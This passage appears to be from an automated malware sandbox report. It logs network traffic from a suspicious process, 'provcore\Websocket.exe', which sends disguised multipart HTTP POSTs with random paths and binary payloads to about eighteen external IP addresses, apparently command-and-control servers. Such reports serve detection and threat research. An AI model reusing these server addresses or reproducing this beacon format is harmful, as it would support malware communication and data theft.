                                  Aug 20, 2024 17:47:35.976732016 CEST808049725157.245.99.39192.168.2.12
                                  Aug 20, 2024 17:47:35.976906061 CEST808049725157.245.99.39192.168.2.12
                                  Aug 20, 2024 17:47:38.195614100 CEST497268080192.168.2.12137.59.187.107
                                  Aug 20, 2024 17:47:38.200844049 CEST808049726137.59.187.107192.168.2.12
                                  Aug 20, 2024 17:47:38.200989008 CEST497268080192.168.2.12137.59.187.107
                                  Aug 20, 2024 17:47:38.201150894 CEST497268080192.168.2.12137.59.187.107
                                  Aug 20, 2024 17:47:38.201210022 CEST497268080192.168.2.12137.59.187.107
                                  Aug 20, 2024 17:47:38.206254005 CEST808049726137.59.187.107192.168.2.12
                                  Aug 20, 2024 17:47:38.206302881 CEST808049726137.59.187.107192.168.2.12
                                  Aug 20, 2024 17:47:38.206357002 CEST808049726137.59.187.107192.168.2.12
                                  Aug 20, 2024 17:47:38.206384897 CEST808049726137.59.187.107192.168.2.12
                                  Aug 20, 2024 17:47:38.206413031 CEST808049726137.59.187.107192.168.2.12
                                  Aug 20, 2024 17:47:59.609304905 CEST808049726137.59.187.107192.168.2.12
                                  Aug 20, 2024 17:47:59.609412909 CEST497268080192.168.2.12137.59.187.107
                                  Aug 20, 2024 17:47:59.609510899 CEST497268080192.168.2.12137.59.187.107
                                  Aug 20, 2024 17:47:59.614538908 CEST808049726137.59.187.107192.168.2.12
                                  Aug 20, 2024 17:48:03.378746986 CEST62404443192.168.2.1294.23.237.171
                                  Aug 20, 2024 17:48:03.378784895 CEST4436240494.23.237.171192.168.2.12
                                  Aug 20, 2024 17:48:03.378869057 CEST62404443192.168.2.1294.23.237.171
                                  Aug 20, 2024 17:48:03.378998041 CEST62404443192.168.2.1294.23.237.171
                                  Aug 20, 2024 17:48:03.379008055 CEST4436240494.23.237.171192.168.2.12
                                  Aug 20, 2024 17:48:03.379051924 CEST62404443192.168.2.1294.23.237.171
                                  Aug 20, 2024 17:48:03.379060984 CEST4436240494.23.237.171192.168.2.12
                                  Aug 20, 2024 17:48:03.379077911 CEST4436240494.23.237.171192.168.2.12
                                  Aug 20, 2024 17:48:07.051640987 CEST62405443192.168.2.1261.19.246.238
                                  Aug 20, 2024 17:48:07.051691055 CEST4436240561.19.246.238192.168.2.12
                                  Aug 20, 2024 17:48:07.051759005 CEST62405443192.168.2.1261.19.246.238
                                  Aug 20, 2024 17:48:07.059957027 CEST62405443192.168.2.1261.19.246.238
                                  Aug 20, 2024 17:48:07.059993982 CEST4436240561.19.246.238192.168.2.12
                                  Aug 20, 2024 17:48:07.060015917 CEST62405443192.168.2.1261.19.246.238
                                  Aug 20, 2024 17:48:07.060029030 CEST4436240561.19.246.238192.168.2.12
                                  Aug 20, 2024 17:48:07.060054064 CEST4436240561.19.246.238192.168.2.12
                                  Aug 20, 2024 17:48:10.483428955 CEST6240680192.168.2.12156.155.166.221
                                  Aug 20, 2024 17:48:10.488749027 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:10.488851070 CEST6240680192.168.2.12156.155.166.221
                                  Aug 20, 2024 17:48:10.488987923 CEST6240680192.168.2.12156.155.166.221
                                  Aug 20, 2024 17:48:10.488987923 CEST6240680192.168.2.12156.155.166.221
                                  Aug 20, 2024 17:48:10.493989944 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:10.494025946 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:10.494035959 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:10.494070053 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:10.494119883 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:10.494129896 CEST8062406156.155.166.221192.168.2.12
                                  Aug 20, 2024 17:48:13.359842062 CEST6240780192.168.2.1250.35.17.13
                                  Aug 20, 2024 17:48:13.364779949 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.365006924 CEST6240780192.168.2.1250.35.17.13
                                  Aug 20, 2024 17:48:13.365008116 CEST6240780192.168.2.1250.35.17.13
                                  Aug 20, 2024 17:48:13.365048885 CEST6240780192.168.2.1250.35.17.13
                                  Aug 20, 2024 17:48:13.370033026 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.370223999 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.370254040 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.370264053 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.370279074 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:13.370287895 CEST806240750.35.17.13192.168.2.12
                                  Aug 20, 2024 17:48:16.872211933 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.877244949 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.877353907 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.877501965 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.877532959 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.882364035 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.882385015 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.882414103 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.882425070 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.882435083 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.882450104 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.882559061 CEST6240880192.168.2.12153.137.36.142
                                  Aug 20, 2024 17:48:16.883310080 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.887274027 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:16.887507915 CEST8062408153.137.36.142192.168.2.12
                                  Aug 20, 2024 17:48:19.948684931 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.953665972 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.953783989 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.954139948 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.954278946 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.958830118 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.958899021 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.959026098 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.959043026 CEST624097080192.168.2.1291.211.88.52
                                  Aug 20, 2024 17:48:19.959196091 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.959261894 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.959271908 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.959670067 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.963711977 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:19.963984966 CEST70806240991.211.88.52192.168.2.12
                                  Aug 20, 2024 17:48:22.184917927 CEST624108080192.168.2.12209.141.54.221
                                  Aug 20, 2024 17:48:22.190300941 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.190401077 CEST624108080192.168.2.12209.141.54.221
                                  Aug 20, 2024 17:48:22.190536976 CEST624108080192.168.2.12209.141.54.221
                                  Aug 20, 2024 17:48:22.190576077 CEST624108080192.168.2.12209.141.54.221
                                  Aug 20, 2024 17:48:22.195311069 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.195456982 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.195466042 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.195708036 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.195718050 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:22.196754932 CEST808062410209.141.54.221192.168.2.12
                                  Aug 20, 2024 17:48:24.555346012 CEST62411443192.168.2.12185.94.252.104
                                  Aug 20, 2024 17:48:24.555401087 CEST44362411185.94.252.104192.168.2.12
                                  Aug 20, 2024 17:48:24.555481911 CEST62411443192.168.2.12185.94.252.104
                                  Aug 20, 2024 17:48:24.555603981 CEST62411443192.168.2.12185.94.252.104
                                  Aug 20, 2024 17:48:24.555614948 CEST44362411185.94.252.104192.168.2.12
                                  Aug 20, 2024 17:48:24.555649042 CEST62411443192.168.2.12185.94.252.104
                                  Aug 20, 2024 17:48:24.555660009 CEST44362411185.94.252.104192.168.2.12
                                  Aug 20, 2024 17:48:24.555753946 CEST44362411185.94.252.104192.168.2.12
                                  Aug 20, 2024 17:48:27.429323912 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:27.434710026 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:27.434808016 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:27.434936047 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:27.434988022 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:27.439925909 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:27.439960003 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:27.439994097 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:27.440048933 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:27.440411091 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:48.814197063 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:48.814321041 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:48.814505100 CEST6241880192.168.2.12174.45.13.118
                                  Aug 20, 2024 17:48:48.819361925 CEST8062418174.45.13.118192.168.2.12
                                  Aug 20, 2024 17:48:51.780136108 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:51.785180092 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:51.785458088 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:51.785458088 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:51.785516024 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:51.790793896 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:51.790872097 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:51.790894032 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:51.790999889 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:51.791013002 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:53.453581095 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:53.453902960 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:53.457211971 CEST624198080192.168.2.1287.106.136.232
                                  Aug 20, 2024 17:48:53.462081909 CEST80806241987.106.136.232192.168.2.12
                                  Aug 20, 2024 17:48:57.132818937 CEST6242080192.168.2.1262.75.141.82
                                  Aug 20, 2024 17:48:57.137806892 CEST806242062.75.141.82192.168.2.12
                                  Aug 20, 2024 17:48:57.137926102 CEST6242080192.168.2.1262.75.141.82
                                  Aug 20, 2024 17:48:57.138402939 CEST6242080192.168.2.1262.75.141.82
                                  Aug 20, 2024 17:48:57.138427973 CEST6242080192.168.2.1262.75.141.82
                                  Aug 20, 2024 17:48:57.143229961 CEST806242062.75.141.82192.168.2.12
                                  Aug 20, 2024 17:48:57.143284082 CEST806242062.75.141.82192.168.2.12
                                  Aug 20, 2024 17:48:57.143292904 CEST806242062.75.141.82192.168.2.12
                                  Aug 20, 2024 17:48:57.143306971 CEST806242062.75.141.82192.168.2.12
                                  Aug 20, 2024 17:48:57.146547079 CEST806242062.75.141.82192.168.2.12

                                  UDP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Aug 20, 2024 17:47:38.894963980 CEST5355630162.159.36.2192.168.2.12

                                  HTTP Request Dependency Graph

                                  • 71.72.196.159
                                  • 134.209.36.254
                                    • 134.209.36.254:8080
                                  • 120.138.30.150
                                    • 120.138.30.150:8080
                                  • 94.23.216.33
                                  • 157.245.99.39
                                    • 157.245.99.39:8080
                                  • 137.59.187.107
                                    • 137.59.187.107:8080
                                  • 94.23.237.171
                                    • 94.23.237.171:443
                                  • 61.19.246.238
                                    • 61.19.246.238:443
                                  • 156.155.166.221
                                  • 50.35.17.13
                                  • 153.137.36.142
                                  • 91.211.88.52
                                    • 91.211.88.52:7080
                                  • 209.141.54.221
                                    • 209.141.54.221:8080
                                  • 185.94.252.104
                                    • 185.94.252.104:443
                                  • 174.45.13.118
                                  • 87.106.136.232
                                    • 87.106.136.232:8080
                                  • 62.75.141.82

                                  HTTP Packets

                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  0192.168.2.124971271.72.196.159806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:47:21.373636007 CEST542OUTPOST /U79iM382/IZ04Joc/eLC1daPUos8/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 71.72.196.159/U79iM382/IZ04Joc/eLC1daPUos8/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=------------cs4fTNfbtTQb
                                  Host: 71.72.196.159
                                  Content-Length: 4660
                                  Cache-Control: no-cache
                                  Aug 20, 2024 17:47:21.373673916 CEST4660OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 63 73 34 66 54 4e 66 62 74 54 51 62 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6e 6c 7a 75 6c 6f 73 74 70 65 68 6e 67 6d
                                  Data Ascii: --------------cs4fTNfbtTQbContent-Disposition: form-data; name="nlzulostpehngmd"; filename="aapskeqwasxvhodscxn"Content-Type: application/octet-streamYyF7X95*,K4_[E"lf2%TnrfvFASDi


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  1192.168.2.1249722134.209.36.25480806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:47:24.943783045 CEST657OUTPOST /T5Vg4Qw6cjD/Ig1s2FXtpuz/TQ9zRX6lxh/onfM1cXpehs4Ys/zuNlQfl2ySC/vyKTBvDcyugOiz5nO8/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 134.209.36.254/T5Vg4Qw6cjD/Ig1s2FXtpuz/TQ9zRX6lxh/onfM1cXpehs4Ys/zuNlQfl2ySC/vyKTBvDcyugOiz5nO8/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=--------------mk75J6XmW2R3bq
                                  Host: 134.209.36.254:8080
                                  Content-Length: 4660
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  2192.168.2.1249723120.138.30.15080806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:47:28.283018112 CEST549OUTPOST /3c7L3qI9O7w/Rm0uJBYq9TtaH/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 120.138.30.150/3c7L3qI9O7w/Rm0uJBYq9TtaH/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=---------------VnrwklFt5SvgEBv
                                  Host: 120.138.30.150:8080
                                  Content-Length: 4660
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  3192.168.2.124972494.23.216.33806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:47:32.858660936 CEST542OUTPOST /4sERDG3EhH4jL/eJgQIlw4kZ/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 94.23.216.33/4sERDG3EhH4jL/eJgQIlw4kZ/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=-----------------dNvw9ZmlFxNAzGF12
                                  Host: 94.23.216.33
                                  Content-Length: 4660
                                  Cache-Control: no-cache
                                  Aug 20, 2024 17:47:32.858719110 CEST4660OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 64 4e 76 77 39 5a 6d 6c 46 78 4e 41 7a 47 46 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 76 77 6b 71
                                  Data Ascii: -------------------dNvw9ZmlFxNAzGF12Content-Disposition: form-data; name="vwkqjvubdwyo"; filename="lldklmbdve"Content-Type: application/octet-streamHmAo2_(,k5$hS&jh#bRPUMD#O


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  4192.168.2.1249725157.245.99.3980806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:47:35.971529961 CEST605OUTPOST /iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 157.245.99.39/iak3uhyFk7lpr6JuOK/tB1LHPYJU1WTt8sLQn/ANk4kL9bS/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------------0xXrF4Ymva2woSLWTDYnAi
                                  Host: 157.245.99.39:8080
                                  Content-Length: 4660
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  5192.168.2.1249726137.59.187.10780806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:47:38.201150894 CEST619OUTPOST /JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 137.59.187.107/JN2DplxF92Pi/qZ21yDZ4M/ris4gHcOGLF4hcPHwQ/A1nU/6tibZPGO3hJC/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------yA0yv22gQqHz91Fm
                                  Host: 137.59.187.107:8080
                                  Content-Length: 4660
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  6192.168.2.126240494.23.237.1714436716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:48:03.378998041 CEST588OUTPOST /QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 94.23.237.171/QhMD6KpexuBHSeyg/nmjgYh4l4ptvB/PGvKi7u5nK/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=--------------------8l9iSdFwjKbTCnC5XLPO
                                  Host: 94.23.237.171:443
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  7192.168.2.126240561.19.246.2384436716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:48:07.059957027 CEST506OUTPOST /Gm1WL3Kb/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 61.19.246.238/Gm1WL3Kb/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=------------H7vKgpo0TK2t
                                  Host: 61.19.246.238:443
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  8192.168.2.1262406156.155.166.221806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:48:10.488987923 CEST582OUTPOST /yeefk/tw301PEhQBGehUNW/CiErQs/MRjdl7CYu1IU7v3m15J/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 156.155.166.221/yeefk/tw301PEhQBGehUNW/CiErQs/MRjdl7CYu1IU7v3m15J/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=---------84P2IJMkL
                                  Host: 156.155.166.221
                                  Content-Length: 4628
                                  Cache-Control: no-cache
                                  Aug 20, 2024 17:48:10.488987923 CEST4628OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 34 50 32 49 4a 4d 6b 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 62 65 76 66 6c 70 73 6e 63 66 6d 62 22 3b 20 66 69 6c 65
                                  Data Ascii: -----------84P2IJMkLContent-Disposition: form-data; name="tbevflpsncfmb"; filename="gpkguma"Content-Type: application/octet-stream[D\xA*8HK`uEu8-)hFg8_qp {ZBfR&ua3-


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  9192.168.2.126240750.35.17.13806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:48:13.365008116 CEST580OUTPOST /nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 50.35.17.13/nrCUrCE2yDTiIo4a/5Gs4u/KUPipnX9S5yDUVyF8b/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=--------------------pU7FVH6UNlQM04HdUu46
                                  Host: 50.35.17.13
                                  Content-Length: 4628
                                  Cache-Control: no-cache
                                  Aug 20, 2024 17:48:13.365048885 CEST4628OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 70 55 37 46 56 48 36 55 4e 6c 51 4d 30 34 48 64 55 75 34 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65
                                  Data Ascii: ----------------------pU7FVH6UNlQM04HdUu46Content-Disposition: form-data; name="clsguwwg"; filename="jrmsyryvcsmdyh"Content-Type: application/octet-streame6ygb;0ugc~!CC_bh:?=OJ0d0b@?C7


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  10192.168.2.1262408153.137.36.142806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:48:16.877501965 CEST596OUTPOST /ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 153.137.36.142/ekpYWl8oCs7C/uUSPOoA/83Mn2qAQ2/yBWXbxwj/GOVd3DoQP6/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------5UCIEVFUgKC9ns3t
                                  Host: 153.137.36.142
                                  Content-Length: 4628
                                  Cache-Control: no-cache
                                  Aug 20, 2024 17:48:16.877532959 CEST4628OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 35 55 43 49 45 56 46 55 67 4b 43 39 6e 73 33 74 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 71 6c 69 6e 69
                                  Data Ascii: ------------------5UCIEVFUgKC9ns3tContent-Disposition: form-data; name="bqlinitoyanh"; filename="oekzogwfmpjcauqobb"Content-Type: application/octet-streamxoZC0bRDDB"=gEoyHx9a1i3~oNz?C


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  11192.168.2.126240991.211.88.5270806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:48:19.954139948 CEST625OUTPOST /UgjaCEdTc9AlgOLmob/lJ2pCDETY/jJXL8eM/bkqmaKbdvAGP/AYsIr7b4/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
                                  Accept-Language: en-US,en;q=0.5
                                  Accept-Encoding: gzip, deflate
                                  DNT: 1
                                  Connection: keep-alive
                                  Referer: 91.211.88.52/UgjaCEdTc9AlgOLmob/lJ2pCDETY/jJXL8eM/bkqmaKbdvAGP/AYsIr7b4/
                                  Upgrade-Insecure-Requests: 1
                                  Content-Type: multipart/form-data; boundary=----------------------ayNnG1JNfmOIUancEJINhP
                                  Host: 91.211.88.52:7080
                                  Content-Length: 4628
                                  Cache-Control: no-cache


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  12192.168.2.1262410209.141.54.22180806716C:\Windows\SysWOW64\provcore\Websocket.exe
                                  TimestampBytes transferredDirectionData
                                  Aug 20, 2024 17:48:22.190536976 CEST525OUTPOST /mf37D3hHo2BT/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
